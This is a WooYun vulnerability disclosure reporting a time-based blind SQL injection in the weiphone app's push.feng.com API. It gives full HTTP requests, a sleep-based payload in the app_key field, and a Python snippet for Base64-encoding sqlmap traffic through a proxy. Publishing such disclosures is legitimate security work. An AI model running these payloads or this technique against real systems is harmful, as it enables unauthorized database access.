
Vulnerability Summary

Defect ID: wooyun-2016-0177954

Title: SQL injection in the official 威锋 (weiphone) app (a SQLMAP example with full-POST Base64 encoding)

Vendor: weiphone

Author: 路人甲

Submitted: 2016-02-23 13:41

Fix time: 2016-02-28 13:50

Published: 2016-02-28 13:50

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Vendor notified, vendor ignored the vulnerability

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability Details

Disclosure status:

2016-02-23: Details sent to the vendor, awaiting vendor response
2016-02-28: Vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

App security: SQL injection

Detailed description:

Target: 威锋 iOS app
Testing found SQL injection at the following location:

POST http://push.feng.com/index.php?r=api/client/startdevicecall HTTP/1.1
Host: push.feng.com
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
Proxy-Connection: keep-alive
Accept: */*
User-Agent: WPForumPortal/4.2 (iPhone; iOS 9.2.1; Scale/2.00)
Accept-Language: zh-Hans-CN;q=1
Content-Length: 1555
Accept-Encoding: gzip, deflate
data=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%3D


URL-decoding and then Base64-decoding the POST body gives the following (the injected parameter is app_key; time-based blind):

data={"app_key":"ade966d51f5259edad1346347c512740","verify":"949c18e15ad6d040db80577ce515476f","encrypt_data":"wntQ\/xBw6bvaEvM1nW2yJB3x9q0lH7auwFD3epET7TcD7+nA2XWoM5drb33FIcJNwBzTGawW7j\/TTsY0fbJt7vxpXaZvfQd2aEMfco4SNn9XAf+N53TCez3M5U1p0i3KLzAeRWDEK8gNQZ063UYDn\/RcxxZBXW5fX1EKPg6YCdGOwBAiQnc5v5ALWOxNe7f1078eMEP1na\/4Q9E7DMWYDNjd4CwDKye2Mpb6rornkem9yNwtDJk2+Y83t0MxsHZQbTStxgpIEtp37JaLVtKTcMoAJT1fBmxap66QgLvhLcOmHOxXIxtWrgNxa3qMxWGfgtFaqML0OmAXCY2n9O9KovMoDced6EXkmRw\/aLkV7xzyx5dwUpmloHThLC6VP8xHyILqZM079B7xXPaEK8QmyXVc7PEdrviOODvXJhmf96RKDm7Wsb5hm6Qr+8hQ8SzEAtSxBNF2bwHGaYgbh\/cd4Tsd4XtN8kGhtHX1QnsGccUHZxNcGcQsXuqcn+qKgLyy5iJ\/kv3Sc6BZ8FU11kh+nY2Ei97\/+RMEe+ZQGDPbOvz6NNs2RuINQLva8mElE\/tdyoQTKHu6p+2cZd7AaJfJ+RNFN+gWG0BU61afISknEAQ0AxRIhluEklGzgQw6xvSc5mwxSgpAZH0CG5SJQ50GTV1QLAs5aI1wKp2Kw+T1NJ8VKFlWJnHPLPKdCgx8G6w4ULMWAKKM3yBWEP\/nfqEFxqCt1W++HwCJWHS0EI5TeSL7Iwm+DHJt+MuU1OnrZ8StRz7hcaPkchj3rgRM1P\/mXZiFStstgflmt4msdamNBjbBb8BG9rsv8Jglg0tl6jLnaEzVK0ON5KY5kFKJmXW96TeHnDjRISC4BNzAIJP\/Q1Pej3Bwflg\/LYWMc4+VoEUgg5vw9jI0eeW6jL3C2B\/BFOy7hr8laADIS\/jpisrTL4YoBZ84BVOVdlT2RLBa5ZNBRmJuhTCiAKyNwFCEY757\/IO8mmi1fNKEe2hf4wWGKRnM1IH8Zg+vviKJd7kiqbyDpplbfVX92AM="}


Payload (3-second delay):

{"app_key":"(select(0)from(select(sleep(0)))v)\/*'+(select(0)from(select(sleep(3)))v)+'\"+(select(0)from(select(sleep(0)))v)+\"*\/","encrypt_data":"wntQ\/xBw6bvaEvM1nW2yJB3x9q0lH7auwFD3epET7TcD7+nA2XWoM5drb33FIcJNwBzTGawW7j\/TTsY0fbJt7vxpXaZvfQd2aEMfco4SNn9XAf+N53TCez3M5U1p0i3KLzAeRWDEK8gNQZ063UYDn\/RcxxZBXW5fX1EKPg6YCdGOwBAiQnc5v5ALWOxNe7f1078eMEP1na\/4Q9E7DMWYDNjd4CwDKye2Mpb6rornkem9yNwtDJk2+Y83t0MxsHZQbTStxgpIEtp37JaLVtKTcMoAJT1fBmxap66QgLvhLcOmHOxXIxtWrgNxa3qMxWGfgtFaqML0OmAXCY2n9O9KovMoDced6EXkmRw\/aLkV7xzyx5dwUpmloHThLC6VP8xHyILqZM079B7xXPaEK8QmyXVc7PEdrviOODvXJhmf96RKDm7Wsb5hm6Qr+8hQ8SzEAtSxBNF2bwHGaYgbh\/cd4Tsd4XtN8kGhtHX1QnsGccUHZxNcGcQsXuqcn+qKgLyy5iJ\/kv3Sc6BZ8FU11kh+nY2Ei97\/+RMEe+ZQGDPbOvz6NNs2RuINQLva8mElE\/tdyoQTKHu6p+2cZd7AaJfJ+RNFN+gWG0BU61afISknEAQ0AxRIhluEklGzgQw6xvSc5mwxSgpAZH0CG5SJQ50GTV1QLAs5aI1wKp2Kw+T1NJ8VKFlWJnHPLPKdCgx8G6w4ULMWAKKM3yBWEP\/nfqEFxqCt1W++HwCJWHS0EI5TeSL7Iwm+DHJt+MuU1OnrZ8StRz7hcaPkchj3rgRM1P\/mXZiFStstgflmt4msdamNBjbBb8BG9rsv8Jglg0tl6jLnaEzVK0ON5KY5kFKJmXW96TeHnDjRISC4BNzAIJP\/Q1Pej3Bwflg\/LYWMc4+VoEUgg5vw9jI0eeW6jL3C2B\/BFOy7hr8laADIS\/jpisrTL4YoBZ84BVOVdlT2RLBa5ZNBRmJuhTCiAKyNwFCEY757\/IO8mmi1fNKEe2hf4wWGKRnM1IH8Zg+vviKJd7kiqbyDpplbfVX92AM=","verify":"949c18e15ad6d040db80577ce515476f"}


POST /index.php?r=api/client/startdevicecall HTTP/1.1
Content-Length: 1673
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://push.feng.com/index.php?r=api/client/startdevicecall
Host: push.feng.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
data=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%3d%3d

Proof of vulnerability:

Because sqlmap's base64encode tamper only encodes the payload fragment, while here the entire POST body is Base64-encoded, sqlmap cannot be run against the endpoint directly.
So I put together a Python proxy, routed sqlmap's traffic through it, rewrote the requests in bulk, and had the program do the Base64 encoding itself:

import base64

# strip the leading "data=" from sqlmap's body and Base64-encode the whole remaining value
new_postdata = 'data=' + base64.b64encode(old_postdata[5:])


Finally, the database name as proof:

(screenshot: db.jpg)


Fix recommendation:

Suggestions welcome~

Copyright notice: when reposting, please credit 路人甲@乌云


Vulnerability Response

Vendor response:

Severity: No impact; vendor ignored

Ignored at: 2016-02-28 13:50

Vendor reply:

Vulnerability Rank: 15 (WooYun assessment)

Latest status:

None